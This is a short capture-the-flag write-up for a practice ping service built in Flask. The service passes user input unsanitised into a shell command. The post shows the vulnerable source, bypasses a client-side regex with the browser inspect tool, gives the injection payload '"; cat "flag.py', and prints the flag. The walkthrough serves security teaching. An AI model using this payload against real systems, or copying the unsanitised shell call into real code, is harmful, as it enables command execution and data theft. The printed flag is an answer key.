Post

command-injection-1

Posted
By thanguyen165 1 min read

Description

A service that sends ping packets to a specific Host.

Acquire the flag through Command Injection. The flag is located in .flag.py

Attached

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

#!/usr/bin/env python3
import subprocess

from flask import Flask, request, render_template, redirect

from flag import FLAG

APP = Flask(__name__)


@APP.route('/')
def index():
    return render_template('index.html')


@APP.route('/ping', methods=['GET', 'POST'])
def ping():
    if request.method == 'POST':
        host = request.form.get('host')
        cmd = f'ping -c 3 "{host}"'
        try:
            output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
            return render_template('ping_result.html', data=output.decode('utf-8'))
        except subprocess.TimeoutExpired:
            return render_template('ping_result.html', data='Timeout !')
        except subprocess.CalledProcessError:
            return render_template('ping_result.html', data=f'an error occurred while executing the command. -> {cmd}')

    return render_template('ping.html')


if __name__ == '__main__':
    APP.run(host='0.0.0.0', port=8000)

Analyzation

When receiving request, the server pings without checking

1

ping -c 3 "{host}"

This is a command injection. It can be easily solved by

1

"; cat "flag.py

But it did not work! It kept saying

1

Please match the requested format.

Check the source code of ping.html (by inspect tool)

1
2
3
4
5
6
7
8
9
10
11

<h1>Let's ping your host</h1><br/>
<form method="POST">
  <div class="row">
    <div class="col-md-6 form-group">
      <label for="Host">Host</label>
      <input type="text" class="form-control" id="Host" placeholder="8.8.8.8" name="host" pattern="[A-Za-z0-9.]{5,20}" required>
    </div>
  </div>

  <button type="submit" class="btn btn-default">Ping!</button>
</form>

This is the regex

1

<input pattern="[A-Za-z0-9.]{5,20}" required>

(check regex101.com to understand the regex)

So we need to do something with it. Fortunately, it is in client side!

Solution

Use inspect tool, delete the regex checking above. Then input the payload

1

"; cat "flag.py

The flag is

1

DH{pingpingppppppppping!!}
Practice, dreamhack
Web Exploitation OS command injection
This post is licensed under CC BY 4.0 by the author.